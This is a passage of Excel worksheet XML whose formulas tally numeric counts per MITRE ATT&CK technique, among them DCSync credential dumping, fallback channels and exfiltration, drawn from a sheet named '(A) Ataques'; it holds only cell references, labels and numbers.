      <c r="AY4" s="469">
        <f>'(A) Ataques'!LU4+'(A) Ataques'!MA4+'(A) Ataques'!MG4+'(A) Ataques'!MM4+'(A) Ataques'!MS4</f>
        <v>0</v>
      </c>
      <c r="AZ4" s="510">
        <f>'(A) Ataques'!LW4+'(A) Ataques'!MC4+'(A) Ataques'!MI4+'(A) Ataques'!MO4+'(A) Ataques'!MU4</f>
        <v>0</v>
      </c>
      <c r="BA4" s="471">
        <f>'(A) Ataques'!LY4+'(A) Ataques'!ME4+'(A) Ataques'!MK4+'(A) Ataques'!MQ4+'(A) Ataques'!MW4</f>
        <v>0</v>
      </c>
      <c r="BB4" s="471">
        <f>'(A) Ataques'!LQ4</f>
        <v>0</v>
      </c>
      <c r="BC4" s="331">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",IF($AY4=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD4" s="469">
        <f>IF('(A) Ataques'!$AP4&lt;&gt;"NO",'(A) Ataques'!LL4,"")</f>
        <v>1</v>
      </c>
      <c r="BE4" s="510">
        <f>IF('(A) Ataques'!$AP4&lt;&gt;"NO",'(A) Ataques'!LM4,"")</f>
        <v>1</v>
      </c>
      <c r="BF4" s="471">
        <f>IF('(A) Ataques'!$AP4&lt;&gt;"NO",'(A) Ataques'!LN4,"")</f>
        <v>0</v>
      </c>
      <c r="BG4" s="471">
        <f>IF('(A) Ataques'!$AP4&lt;&gt;"NO",'(A) Ataques'!LO4,"")</f>
        <v>1</v>
      </c>
      <c r="BH4" s="471">
        <f>IF('(A) Ataques'!$AP4&lt;&gt;"NO",'(A) Ataques'!LS4,"")</f>
        <v>1</v>
      </c>
      <c r="BI4" s="331">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",IF($BD4=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ4" s="469">
        <f>'(A) Ataques'!OL4+'(A) Ataques'!OR4+'(A) Ataques'!OX4+'(A) Ataques'!PD4+'(A) Ataques'!PJ4</f>
        <v>2</v>
      </c>
      <c r="BK4" s="510">
        <f>'(A) Ataques'!ON4+'(A) Ataques'!OT4+'(A) Ataques'!OZ4+'(A) Ataques'!PF4+'(A) Ataques'!PL4</f>
        <v>2</v>
      </c>
      <c r="BL4" s="471">
        <f>'(A) Ataques'!OP4+'(A) Ataques'!OV4+'(A) Ataques'!PB4+'(A) Ataques'!PH4+'(A) Ataques'!PN4</f>
        <v>2</v>
      </c>
      <c r="BM4" s="495">
        <f>'(A) Ataques'!OH4</f>
        <v>1</v>
      </c>
      <c r="BN4" s="331">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",IF($BJ4=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO4" s="469">
        <f>IF('(A) Ataques'!$AP4&lt;&gt;"NO",'(A) Ataques'!OC4,"")</f>
        <v>2</v>
      </c>
      <c r="BP4" s="510">
        <f>IF('(A) Ataques'!$AP4&lt;&gt;"NO",'(A) Ataques'!OD4,"")</f>
        <v>2</v>
      </c>
      <c r="BQ4" s="471">
        <f>IF('(A) Ataques'!$AP4&lt;&gt;"NO",'(A) Ataques'!OE4,"")</f>
        <v>2</v>
      </c>
      <c r="BR4" s="471">
        <f>IF('(A) Ataques'!$AP4&lt;&gt;"NO",'(A) Ataques'!OF4,"")</f>
        <v>1</v>
      </c>
      <c r="BS4" s="471">
        <f>IF('(A) Ataques'!$AP4&lt;&gt;"NO",'(A) Ataques'!OJ4,"")</f>
        <v>1</v>
      </c>
      <c r="BT4" s="331">
        <f>IF('(A) Ataques'!$AK4&lt;&gt;"NO",IF($BO4=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A5" s="79">
        <f t="shared" ref="A5:A68" si="0">A4+1</f>
        <v>3</v>
      </c>
      <c r="B5" s="4">
        <f>IF('(A) Ataques'!AK5&lt;&gt;"NO",'(A) Ataques'!E5,"")</f>
        <v>2</v>
      </c>
      <c r="C5" s="6" t="str">
        <f>IF('(A) Ataques'!AK5&lt;&gt;"NO",IF('(A) Ataques'!M5="","",'(A) Ataques'!M5),"")</f>
        <v>T1003.006-Os_credential_dumping_dcsync</v>
      </c>
      <c r="D5" s="4" t="str">
        <f>IF('(A) Ataques'!AK5&lt;&gt;"NO",'(A) Ataques'!F5,"")</f>
        <v>T1003</v>
      </c>
      <c r="E5" s="286">
        <f>IF('(A) Ataques'!AK5&lt;&gt;"NO",'(A) Ataques'!AQ5,"")</f>
        <v>3</v>
      </c>
      <c r="F5" s="288">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!BB5,"")</f>
        <v>3</v>
      </c>
      <c r="G5" s="392">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!BD5,"")</f>
        <v>2</v>
      </c>
      <c r="H5" s="4">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!BF5,"")</f>
        <v>2</v>
      </c>
      <c r="I5" s="20">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!BG5,"")</f>
        <v>1</v>
      </c>
      <c r="J5" s="530">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",IF($F5=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K5" s="322">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$BH5,"")</f>
        <v>0</v>
      </c>
      <c r="L5" s="322">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$BJ5,"")</f>
        <v>0</v>
      </c>
      <c r="M5" s="4">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$BL5,"")</f>
        <v>0</v>
      </c>
      <c r="N5" s="20">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$BM5,"")</f>
        <v>0</v>
      </c>
      <c r="O5" s="532">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",IF($K5=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P5" s="292">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$BN5,"")</f>
        <v>3</v>
      </c>
      <c r="Q5" s="322">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$BP5,"")</f>
        <v>2</v>
      </c>
      <c r="R5" s="4">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$BR5,"")</f>
        <v>2</v>
      </c>
      <c r="S5" s="20">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$BS5,"")</f>
        <v>1</v>
      </c>
      <c r="T5" s="530">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",IF($P5=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U5" s="322">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$BT5,"")</f>
        <v>4</v>
      </c>
      <c r="V5" s="322">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$BV5,"")</f>
        <v>3</v>
      </c>
      <c r="W5" s="4">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$BX5,"")</f>
        <v>3</v>
      </c>
      <c r="X5" s="20">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$BY5,"")</f>
        <v>2</v>
      </c>
      <c r="Y5" s="532">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",IF($U5=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z5" s="288">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!BZ5,"")</f>
        <v>4</v>
      </c>
      <c r="AA5" s="392">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!CB5,"")</f>
        <v>2</v>
      </c>
      <c r="AB5" s="4">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!CD5,"")</f>
        <v>2</v>
      </c>
      <c r="AC5" s="20">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!CE5,"")</f>
        <v>1</v>
      </c>
      <c r="AD5" s="331">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",IF(Z5=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE5" s="322">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$CF5,"")</f>
        <v>8</v>
      </c>
      <c r="AF5" s="322">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$CH5,"")</f>
        <v>5</v>
      </c>
      <c r="AG5" s="4">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$CJ5,"")</f>
        <v>5</v>
      </c>
      <c r="AH5" s="20">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$CK5,"")</f>
        <v>3</v>
      </c>
      <c r="AI5" s="287">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",IF($AE5=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ5" s="292">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$CL5,"")</f>
        <v>0</v>
      </c>
      <c r="AK5" s="322">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$CN5,"")</f>
        <v>0</v>
      </c>
      <c r="AL5" s="4">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$CP5,"")</f>
        <v>0</v>
      </c>
      <c r="AM5" s="20">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$CQ5,"")</f>
        <v>0</v>
      </c>
      <c r="AN5" s="331">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",IF($AJ5=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO5" s="322">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$CR5,"")</f>
        <v>0</v>
      </c>
      <c r="AP5" s="322">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$CT5,"")</f>
        <v>0</v>
      </c>
      <c r="AQ5" s="4">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$CV5,"")</f>
        <v>0</v>
      </c>
      <c r="AR5" s="20">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!$CW5,"")</f>
        <v>0</v>
      </c>
      <c r="AS5" s="287">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",IF($AO5=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT5" s="288">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!CX5,"")</f>
        <v>3</v>
      </c>
      <c r="AU5" s="392">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!CZ5,"")</f>
        <v>2</v>
      </c>
      <c r="AV5" s="4">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!DB5,"")</f>
        <v>2</v>
      </c>
      <c r="AW5" s="20">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",'(A) Ataques'!DC5,"")</f>
        <v>1</v>
      </c>
      <c r="AX5" s="331">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",IF($AT5=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY5" s="469">
        <f>'(A) Ataques'!LU5+'(A) Ataques'!MA5+'(A) Ataques'!MG5+'(A) Ataques'!MM5+'(A) Ataques'!MS5</f>
        <v>0</v>
      </c>
      <c r="AZ5" s="510">
        <f>'(A) Ataques'!LW5+'(A) Ataques'!MC5+'(A) Ataques'!MI5+'(A) Ataques'!MO5+'(A) Ataques'!MU5</f>
        <v>0</v>
      </c>
      <c r="BA5" s="471">
        <f>'(A) Ataques'!LY5+'(A) Ataques'!ME5+'(A) Ataques'!MK5+'(A) Ataques'!MQ5+'(A) Ataques'!MW5</f>
        <v>0</v>
      </c>
      <c r="BB5" s="471">
        <f>'(A) Ataques'!LQ5</f>
        <v>0</v>
      </c>
      <c r="BC5" s="331">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",IF($AY5=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD5" s="469">
        <f>IF('(A) Ataques'!$AP5&lt;&gt;"NO",'(A) Ataques'!LL5,"")</f>
        <v>3</v>
      </c>
      <c r="BE5" s="510">
        <f>IF('(A) Ataques'!$AP5&lt;&gt;"NO",'(A) Ataques'!LM5,"")</f>
        <v>3</v>
      </c>
      <c r="BF5" s="471">
        <f>IF('(A) Ataques'!$AP5&lt;&gt;"NO",'(A) Ataques'!LN5,"")</f>
        <v>0</v>
      </c>
      <c r="BG5" s="471">
        <f>IF('(A) Ataques'!$AP5&lt;&gt;"NO",'(A) Ataques'!LO5,"")</f>
        <v>3</v>
      </c>
      <c r="BH5" s="471">
        <f>IF('(A) Ataques'!$AP5&lt;&gt;"NO",'(A) Ataques'!LS5,"")</f>
        <v>3</v>
      </c>
      <c r="BI5" s="331">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",IF($BD5=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ5" s="469">
        <f>'(A) Ataques'!OL5+'(A) Ataques'!OR5+'(A) Ataques'!OX5+'(A) Ataques'!PD5+'(A) Ataques'!PJ5</f>
        <v>0</v>
      </c>
      <c r="BK5" s="510">
        <f>'(A) Ataques'!ON5+'(A) Ataques'!OT5+'(A) Ataques'!OZ5+'(A) Ataques'!PF5+'(A) Ataques'!PL5</f>
        <v>0</v>
      </c>
      <c r="BL5" s="471">
        <f>'(A) Ataques'!OP5+'(A) Ataques'!OV5+'(A) Ataques'!PB5+'(A) Ataques'!PH5+'(A) Ataques'!PN5</f>
        <v>0</v>
      </c>
      <c r="BM5" s="495">
        <f>'(A) Ataques'!OH5</f>
        <v>0</v>
      </c>
      <c r="BN5" s="331">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",IF($BJ5=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO5" s="469">
        <f>IF('(A) Ataques'!$AP5&lt;&gt;"NO",'(A) Ataques'!OC5,"")</f>
        <v>0</v>
      </c>
      <c r="BP5" s="510">
        <f>IF('(A) Ataques'!$AP5&lt;&gt;"NO",'(A) Ataques'!OD5,"")</f>
        <v>0</v>
      </c>
      <c r="BQ5" s="471">
        <f>IF('(A) Ataques'!$AP5&lt;&gt;"NO",'(A) Ataques'!OE5,"")</f>
        <v>0</v>
      </c>
      <c r="BR5" s="471">
        <f>IF('(A) Ataques'!$AP5&lt;&gt;"NO",'(A) Ataques'!OF5,"")</f>
        <v>0</v>
      </c>
      <c r="BS5" s="471">
        <f>IF('(A) Ataques'!$AP5&lt;&gt;"NO",'(A) Ataques'!OJ5,"")</f>
        <v>0</v>
      </c>
      <c r="BT5" s="331">
        <f>IF('(A) Ataques'!$AK5&lt;&gt;"NO",IF($BO5=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A6" s="79">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="B6" s="4">
        <f>IF('(A) Ataques'!AK6&lt;&gt;"NO",'(A) Ataques'!E6,"")</f>
        <v>3</v>
      </c>
      <c r="C6" s="6" t="str">
        <f>IF('(A) Ataques'!AK6&lt;&gt;"NO",IF('(A) Ataques'!M6="","",'(A) Ataques'!M6),"")</f>
        <v>T1008-Fallback_channels</v>
      </c>
      <c r="D6" s="4" t="str">
        <f>IF('(A) Ataques'!AK6&lt;&gt;"NO",'(A) Ataques'!F6,"")</f>
        <v>T1008</v>
      </c>
      <c r="E6" s="286">
        <f>IF('(A) Ataques'!AK6&lt;&gt;"NO",'(A) Ataques'!AQ6,"")</f>
        <v>6</v>
      </c>
      <c r="F6" s="288">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!BB6,"")</f>
        <v>15</v>
      </c>
      <c r="G6" s="392">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!BD6,"")</f>
        <v>1</v>
      </c>
      <c r="H6" s="4">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!BF6,"")</f>
        <v>1</v>
      </c>
      <c r="I6" s="20">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!BG6,"")</f>
        <v>1</v>
      </c>
      <c r="J6" s="530">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",IF($F6=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K6" s="322">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$BH6,"")</f>
        <v>17</v>
      </c>
      <c r="L6" s="322">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$BJ6,"")</f>
        <v>7</v>
      </c>
      <c r="M6" s="4">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$BL6,"")</f>
        <v>4</v>
      </c>
      <c r="N6" s="20">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$BM6,"")</f>
        <v>3</v>
      </c>
      <c r="O6" s="532">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",IF($K6=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P6" s="292">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$BN6,"")</f>
        <v>32</v>
      </c>
      <c r="Q6" s="322">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$BP6,"")</f>
        <v>8</v>
      </c>
      <c r="R6" s="4">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$BR6,"")</f>
        <v>5</v>
      </c>
      <c r="S6" s="20">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$BS6,"")</f>
        <v>3</v>
      </c>
      <c r="T6" s="530">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",IF($P6=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U6" s="322">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$BT6,"")</f>
        <v>99</v>
      </c>
      <c r="V6" s="322">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$BV6,"")</f>
        <v>4</v>
      </c>
      <c r="W6" s="4">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$BX6,"")</f>
        <v>3</v>
      </c>
      <c r="X6" s="20">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$BY6,"")</f>
        <v>3</v>
      </c>
      <c r="Y6" s="532">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",IF($U6=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z6" s="288">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!BZ6,"")</f>
        <v>57</v>
      </c>
      <c r="AA6" s="392">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!CB6,"")</f>
        <v>28</v>
      </c>
      <c r="AB6" s="4">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!CD6,"")</f>
        <v>22</v>
      </c>
      <c r="AC6" s="20">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!CE6,"")</f>
        <v>5</v>
      </c>
      <c r="AD6" s="331">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",IF(Z6=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE6" s="322">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$CF6,"")</f>
        <v>156</v>
      </c>
      <c r="AF6" s="322">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$CH6,"")</f>
        <v>32</v>
      </c>
      <c r="AG6" s="4">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$CJ6,"")</f>
        <v>25</v>
      </c>
      <c r="AH6" s="20">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$CK6,"")</f>
        <v>5</v>
      </c>
      <c r="AI6" s="287">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",IF($AE6=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ6" s="292">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$CL6,"")</f>
        <v>0</v>
      </c>
      <c r="AK6" s="322">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$CN6,"")</f>
        <v>0</v>
      </c>
      <c r="AL6" s="4">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$CP6,"")</f>
        <v>0</v>
      </c>
      <c r="AM6" s="20">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$CQ6,"")</f>
        <v>0</v>
      </c>
      <c r="AN6" s="331">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",IF($AJ6=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO6" s="322">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$CR6,"")</f>
        <v>0</v>
      </c>
      <c r="AP6" s="322">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$CT6,"")</f>
        <v>0</v>
      </c>
      <c r="AQ6" s="4">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$CV6,"")</f>
        <v>0</v>
      </c>
      <c r="AR6" s="20">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!$CW6,"")</f>
        <v>0</v>
      </c>
      <c r="AS6" s="287">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",IF($AO6=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT6" s="288">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!CX6,"")</f>
        <v>32</v>
      </c>
      <c r="AU6" s="392">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!CZ6,"")</f>
        <v>8</v>
      </c>
      <c r="AV6" s="4">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!DB6,"")</f>
        <v>5</v>
      </c>
      <c r="AW6" s="20">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",'(A) Ataques'!DC6,"")</f>
        <v>3</v>
      </c>
      <c r="AX6" s="331">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",IF($AT6=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY6" s="469">
        <f>'(A) Ataques'!LU6+'(A) Ataques'!MA6+'(A) Ataques'!MG6+'(A) Ataques'!MM6+'(A) Ataques'!MS6</f>
        <v>6</v>
      </c>
      <c r="AZ6" s="510">
        <f>'(A) Ataques'!LW6+'(A) Ataques'!MC6+'(A) Ataques'!MI6+'(A) Ataques'!MO6+'(A) Ataques'!MU6</f>
        <v>4</v>
      </c>
      <c r="BA6" s="471">
        <f>'(A) Ataques'!LY6+'(A) Ataques'!ME6+'(A) Ataques'!MK6+'(A) Ataques'!MQ6+'(A) Ataques'!MW6</f>
        <v>2</v>
      </c>
      <c r="BB6" s="471">
        <f>'(A) Ataques'!LQ6</f>
        <v>2</v>
      </c>
      <c r="BC6" s="331">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",IF($AY6=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD6" s="469">
        <f>IF('(A) Ataques'!$AP6&lt;&gt;"NO",'(A) Ataques'!LL6,"")</f>
        <v>17</v>
      </c>
      <c r="BE6" s="510">
        <f>IF('(A) Ataques'!$AP6&lt;&gt;"NO",'(A) Ataques'!LM6,"")</f>
        <v>12</v>
      </c>
      <c r="BF6" s="471">
        <f>IF('(A) Ataques'!$AP6&lt;&gt;"NO",'(A) Ataques'!LN6,"")</f>
        <v>2</v>
      </c>
      <c r="BG6" s="471">
        <f>IF('(A) Ataques'!$AP6&lt;&gt;"NO",'(A) Ataques'!LO6,"")</f>
        <v>6</v>
      </c>
      <c r="BH6" s="471">
        <f>IF('(A) Ataques'!$AP6&lt;&gt;"NO",'(A) Ataques'!LS6,"")</f>
        <v>5</v>
      </c>
      <c r="BI6" s="331">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",IF($BD6=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ6" s="469">
        <f>'(A) Ataques'!OL6+'(A) Ataques'!OR6+'(A) Ataques'!OX6+'(A) Ataques'!PD6+'(A) Ataques'!PJ6</f>
        <v>11</v>
      </c>
      <c r="BK6" s="510">
        <f>'(A) Ataques'!ON6+'(A) Ataques'!OT6+'(A) Ataques'!OZ6+'(A) Ataques'!PF6+'(A) Ataques'!PL6</f>
        <v>5</v>
      </c>
      <c r="BL6" s="471">
        <f>'(A) Ataques'!OP6+'(A) Ataques'!OV6+'(A) Ataques'!PB6+'(A) Ataques'!PH6+'(A) Ataques'!PN6</f>
        <v>3</v>
      </c>
      <c r="BM6" s="495">
        <f>'(A) Ataques'!OH6</f>
        <v>3</v>
      </c>
      <c r="BN6" s="331">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",IF($BJ6=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO6" s="469">
        <f>IF('(A) Ataques'!$AP6&lt;&gt;"NO",'(A) Ataques'!OC6,"")</f>
        <v>11</v>
      </c>
      <c r="BP6" s="510">
        <f>IF('(A) Ataques'!$AP6&lt;&gt;"NO",'(A) Ataques'!OD6,"")</f>
        <v>5</v>
      </c>
      <c r="BQ6" s="471">
        <f>IF('(A) Ataques'!$AP6&lt;&gt;"NO",'(A) Ataques'!OE6,"")</f>
        <v>3</v>
      </c>
      <c r="BR6" s="471">
        <f>IF('(A) Ataques'!$AP6&lt;&gt;"NO",'(A) Ataques'!OF6,"")</f>
        <v>2</v>
      </c>
      <c r="BS6" s="471">
        <f>IF('(A) Ataques'!$AP6&lt;&gt;"NO",'(A) Ataques'!OJ6,"")</f>
        <v>3</v>
      </c>
      <c r="BT6" s="331">
        <f>IF('(A) Ataques'!$AK6&lt;&gt;"NO",IF($BO6=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A7" s="79">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
      <c r="B7" s="4">
        <f>IF('(A) Ataques'!AK7&lt;&gt;"NO",'(A) Ataques'!E7,"")</f>
        <v>4</v>
      </c>
      <c r="C7" s="6" t="str">
        <f>IF('(A) Ataques'!AK7&lt;&gt;"NO",IF('(A) Ataques'!M7="","",'(A) Ataques'!M7),"")</f>
        <v>T1011-Exfiltration</v>
      </c>
      <c r="D7" s="4" t="str">
        <f>IF('(A) Ataques'!AK7&lt;&gt;"NO",'(A) Ataques'!F7,"")</f>
        <v>T1011</v>
      </c>
      <c r="E7" s="286">
        <f>IF('(A) Ataques'!AK7&lt;&gt;"NO",'(A) Ataques'!AQ7,"")</f>
        <v>1</v>
      </c>
      <c r="F7" s="288">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!BB7,"")</f>
        <v>1</v>
      </c>
      <c r="G7" s="392">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!BD7,"")</f>
        <v>1</v>
      </c>
      <c r="H7" s="4">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!BF7,"")</f>
        <v>1</v>
      </c>
      <c r="I7" s="20">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!BG7,"")</f>
        <v>1</v>
      </c>
      <c r="J7" s="530">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",IF($F7=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K7" s="322">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$BH7,"")</f>
        <v>0</v>
      </c>
      <c r="L7" s="322">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$BJ7,"")</f>
        <v>0</v>
      </c>
      <c r="M7" s="4">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$BL7,"")</f>
        <v>0</v>
      </c>
      <c r="N7" s="20">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$BM7,"")</f>
        <v>0</v>
      </c>
      <c r="O7" s="532">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",IF($K7=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P7" s="292">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$BN7,"")</f>
        <v>1</v>
      </c>
      <c r="Q7" s="322">
